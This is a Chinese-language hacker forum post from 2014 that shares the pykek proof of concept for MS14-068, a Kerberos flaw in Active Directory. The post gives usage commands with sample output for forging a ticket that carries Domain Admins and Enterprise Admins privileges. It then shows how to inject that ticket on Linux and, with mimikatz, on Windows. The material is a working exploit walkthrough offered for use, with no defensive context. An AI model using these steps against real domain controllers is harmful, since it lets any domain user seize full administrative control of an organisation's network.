搜索
查看: 594|回复: 0

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-12-5 20:14:44 | 显示全部楼层 |阅读模式
https://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

usage:
  1. ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

  2. OPTIONS:
  3.     -p <clearPassword>
  4. --rc4 <ntlmHash>
  5. Example usage :

  6. Linux (tested with samba and MIT Kerberos)

  7. root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
  8. Password:
  9.   [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  10.   [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  11.   [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  12.   [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  13.   [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  14.   [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  15.   [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  16.   [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  17.   [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
  18. root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0
复制代码

on windows:
  1. python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
  2. mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`
复制代码
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表